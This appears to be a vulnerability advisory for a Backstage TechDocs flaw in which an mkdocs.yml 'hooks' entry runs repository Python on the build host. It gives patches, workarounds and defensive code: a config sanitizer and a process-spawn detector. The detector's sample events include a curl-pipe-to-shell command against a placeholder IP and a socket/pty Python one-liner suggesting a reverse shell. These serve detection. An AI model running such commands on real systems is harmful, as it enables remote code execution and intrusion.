CVE-2026-25153
📋 TL;DR
This vulnerability lets an attacker run arbitrary Python on the TechDocs build host when the generator is configured with 'runIn: local'. Anyone who can change a documented repository's mkdocs.yml can point the MkDocs `hooks` setting at a Python file in that repository, which MkDocs imports and executes during the build. Organizations running Backstage TechDocs (or @techdocs/cli) in local execution mode are affected.
💻 Affected Systems
- @backstage/plugin-techdocs-node
- @techdocs/cli
📦 What is this software?
Backstage by Linuxfoundation
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the TechDocs build server, allowing lateral movement to other systems, data exfiltration, and persistent backdoor installation.
Likely Case
Unauthorized code execution on build servers, potentially leading to credential theft, data manipulation, or service disruption.
If Mitigated
Limited to repository-level impact with proper access controls and container isolation, reducing attack surface significantly.
🎯 Exploit Status
Exploitation requires write access to a documented repository's mkdocs.yml, or the ability to get a change to it merged (for example through a pull request). The mechanism is described in the vendor advisory linked below.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: @backstage/plugin-techdocs-node 1.13.11 or 1.14.1
Vendor Advisory: https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf
Restart Required: Yes
Instructions:
1. Update @backstage/plugin-techdocs-node to 1.13.11 or 1.14.1, whichever matches the release line you are on.
2. Update @techdocs/cli to the latest version.
3. Restart all TechDocs services.
4. Confirm that the generator now drops non-allowlisted mkdocs.yml keys (including hooks) and logs a warning when it does.
🔧 Temporary Workarounds
Switch to Docker execution
Configure the TechDocs generator with 'runIn: docker' instead of 'runIn: local'. The hook still executes, but inside the techdocs container rather than on the build host, so this is isolation, not prevention: treat anything mounted into or reachable from that container as exposed.
In app-config.yaml set techdocs.generator.runIn: 'docker'. (The key techdocs.builder selects who builds the docs, 'local' or 'external', and is not the setting involved here.)
Downgrade MkDocs version
Pin MkDocs on the build host to 1.3.1 or earlier: the hooks setting was introduced in MkDocs 1.4, so older releases ignore it. This only helps for local builds, must be applied to the Python environment the TechDocs process actually invokes, and may break plugins that require a newer MkDocs.
pip install mkdocs==1.3.1
🧯 If You Can't Patch
- Implement strict access controls for mkdocs.yml files - only allow trusted contributors to modify
- Require mandatory PR reviews for all mkdocs.yml changes to detect malicious hooks configurations
🔍 How to Verify
Check if Vulnerable:
Check the version of @backstage/plugin-techdocs-node resolved in the backend's lockfile: below 1.13.11, or a 1.14.x release below 1.14.1, is vulnerable when techdocs.generator.runIn is 'local'.
Check Version:
npm list @backstage/plugin-techdocs-node
yarn why @backstage/plugin-techdocs-node   # Backstage apps are normally yarn workspaces
Verify Fix Applied:
Verify @backstage/plugin-techdocs-node version is 1.13.11 or 1.14.1+, and test that mkdocs.yml hooks configuration is now stripped with warning logs
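The strip-with-warning behaviour described in the fix instructions, and the mkdocs.yml review from the "If You Can't Patch" section, as an added Python illustration that is not code from Backstage or @techdocs/cli: a text-level check that drops any top-level mkdocs.yml key outside an allowlist and returns one warning per dropped key. The allowlist, the sample mkdocs.yml and the function name are constructed for the example; the allowlist used by the patched generator is not reproduced here.

```python
"""Drop top-level mkdocs.yml keys that are not on an allowlist.

Example written for this page to illustrate the strip-with-warning behaviour
described in the fix section; it is NOT code from @backstage/plugin-techdocs-node
or @techdocs/cli. It works on the raw YAML text (standard library only),
relying on the fact that every top-level key of a mkdocs.yml starts in column 0,
and it fails closed on any column-0 construct it does not recognise.
"""
import re

# ASSUMPTION: an illustrative allowlist of top-level mkdocs.yml keys. It is not
# the allowlist shipped in the patched TechDocs generator. `hooks` (MkDocs >= 1.4,
# imports and runs Python files from the documentation repository) is absent.
ALLOWED_TOP_LEVEL_KEYS = frozenset({
    "site_name", "site_url", "site_description", "site_author", "copyright",
    "repo_url", "repo_name", "edit_uri", "docs_dir", "site_dir",
    "nav", "theme", "plugins", "markdown_extensions",
    "extra", "extra_css", "extra_javascript", "extra_templates",
    "use_directory_urls", "strict", "dev_addr", "watch", "not_in_nav",
    "exclude_docs", "draft_docs", "validation",
})

# A column-0 `key:` line. Quoted keys are matched too, so `"hooks": [...]` is
# recognised as the key hooks rather than slipping through as unknown text.
_KEY_LINE = re.compile(
    r"""^(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<bare>[^\s#'"\-\[\{][^:\s]*))\s*:(?:\s|$)"""
)


def sanitize_mkdocs_yaml(yaml_text, allowed=ALLOWED_TOP_LEVEL_KEYS):
    """Return (sanitised_yaml, warnings).

    Each top-level key not in `allowed` is removed together with its value
    (every line up to the next top-level key) and reported in `warnings`.
    A column-0 line that is neither a key, a comment, a blank line nor a
    list item raises ValueError: constructs such as the explicit-key form
    `? hooks` could hide a key from a text-level check, so reject the file.
    """
    kept, warnings = [], []
    dropping = None  # name of the disallowed key whose value is being skipped
    for lineno, line in enumerate(yaml_text.splitlines(), 1):
        m = _KEY_LINE.match(line)
        if m:
            key = next(g for g in (m.group("dq"), m.group("sq"), m.group("bare"))
                       if g is not None)
            if key in allowed:
                dropping = None
                kept.append(line)
            else:
                dropping = key
                warnings.append(
                    f"line {lineno}: removed unsupported top-level key {key!r}")
            continue
        stripped = line.strip()
        # Blank lines, comments, indented lines and `- item` lines continue
        # the value of the most recent top-level key.
        continuation = not stripped or stripped.startswith("#") or line[0] in " \t-"
        if not continuation:
            raise ValueError(f"line {lineno}: unrecognised top-level construct {line!r}")
        if dropping is None:
            kept.append(line)
    trailing_newline = "\n" if yaml_text.endswith("\n") else ""
    return "\n".join(kept) + trailing_newline, warnings


# Constructed sample: a normal TechDocs mkdocs.yml with a hooks entry added.
SAMPLE_MKDOCS_YML = """site_name: Example Service
nav:
- Home: index.md
- Ops: ops.md
plugins:
  - techdocs-core
hooks:
  - docs/hooks/exfil.py
markdown_extensions:
  - admonition
"""

if __name__ == "__main__":
    cleaned, warns = sanitize_mkdocs_yaml(SAMPLE_MKDOCS_YML)
    for w in warns:
        print("WARNING", w)
    print(cleaned)
```

Run it as a pull-request check on every mkdocs.yml change, or against the checkout immediately before a local build, and fail the job whenever it returns a warning. A production check should load the file with a real YAML parser and apply the allowlist to the parsed mapping; the text-level version above is a stopgap, which is why it rejects outright any column-0 syntax it cannot classify instead of letting it pass.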
📡 Detection & Monitoring
Log Indicators:
- Warnings about unsupported MkDocs configuration keys being removed
- Unexpected child processes (a shell, curl or wget, a fresh Python interpreter) spawned by the mkdocs build process; the hook itself runs inside that process, so it is the children that stand out
- Unusual mkdocs.yml modifications in repository history
Network Indicators:
- Unexpected outbound connections from TechDocs build servers during a documentation build
Process Indicators:
- Suspicious process spawning by the mkdocs build process during documentation builds
SIEM Query:
process.parent.name: mkdocs OR (process.parent.name: python* AND process.parent.command_line: *mkdocs*)
Field names follow an ECS-style schema and must be mapped to your own. Baseline the children a normal build produces (for example git, if a git-based plugin is in use) and exclude them. Do not rely on cmdline: *hooks*: hooks are declared in mkdocs.yml and never appear on the build command line, so that clause will not fire.
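The process-spawning indicator above as runnable detection logic, added here as an example; it is not a query from this page and not Backstage code. The events are constructed in an ECS-like shape (process.name, process.command_line, process.parent.*), which is an assumption about your telemetry, and the expected-children baseline starts empty by design.

```python
"""Flag processes spawned by a TechDocs MkDocs build.

Example written for this page to turn the "suspicious process spawning during
documentation builds" indicator into runnable detection logic; it is not a
query from the page and not Backstage code. Events are constructed below in
an ECS-like shape (process.name, process.command_line, process.parent.*),
which is an assumption: map the field names to your EDR or SIEM schema.

A hooks entry runs inside the MkDocs interpreter itself, so the useful signal
is not "python spawned by mkdocs" but "anything spawned by the build process
that a normal build does not start".
"""


def is_mkdocs_build(proc):
    """True for a `mkdocs ...` process or a Python interpreter running mkdocs
    (e.g. `python3 -m mkdocs build` or `python3 /usr/local/bin/mkdocs build`)."""
    name = proc.get("name", "")
    if name == "mkdocs":
        return True
    if not name.startswith("python"):
        return False
    tokens = proc.get("command_line", "").split()
    return any(tok.rsplit("/", 1)[-1] == "mkdocs" for tok in tokens)


def flag_build_children(events, expected_children=frozenset()):
    """Return (process_name, reason) pairs for every process whose parent is an
    mkdocs build and whose name is not in `expected_children`.

    ASSUMPTION: `expected_children` starts empty; populate it from a baseline
    of your own builds (for example `git`, if a git-revision plugin is in use).
    """
    findings = []
    for ev in events:
        proc = ev["process"]
        if not is_mkdocs_build(proc.get("parent", {})):
            continue
        if proc.get("name") in expected_children:
            continue
        host = ev.get("host", {}).get("name", "?")
        reason = f"spawned by mkdocs build on {host}: {proc.get('command_line', '')}"
        findings.append((proc.get("name"), reason))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # The build itself, started by the Backstage backend: not a child of mkdocs.
    {"host": {"name": "techdocs-build-1"},
     "process": {"name": "mkdocs", "command_line": "mkdocs build -d /tmp/out",
                 "parent": {"name": "node", "command_line": "node packages/backend"}}},
    # A git-based plugin asking for revision dates: benign once baselined.
    {"host": {"name": "techdocs-build-1"},
     "process": {"name": "git", "command_line": "git log -1 --format=%ct docs/index.md",
                 "parent": {"name": "mkdocs", "command_line": "mkdocs build -d /tmp/out"}}},
    # A shell started from inside the build: what a malicious hook looks like.
    {"host": {"name": "techdocs-build-1"},
     "process": {"name": "sh", "command_line": "sh -c 'curl -s http://203.0.113.10/s | sh'",
                 "parent": {"name": "mkdocs", "command_line": "mkdocs build -d /tmp/out"}}},
    # Same build run through the interpreter; a second interpreter from inside it.
    {"host": {"name": "techdocs-build-2"},
     "process": {"name": "python3", "command_line": "python3 -c 'import socket,pty'",
                 "parent": {"name": "python3", "command_line": "python3 -m mkdocs build"}}},
]

if __name__ == "__main__":
    for name, reason in flag_build_children(SAMPLE_EVENTS, expected_children={"git"}):
        print(f"ALERT {name}: {reason}")
```

The parent check matters more than the child check: matching only `process.name: python` misses a shell or curl started by a hook, while matching on the build process as parent catches every child and lets the baseline, not the rule, decide what is normal.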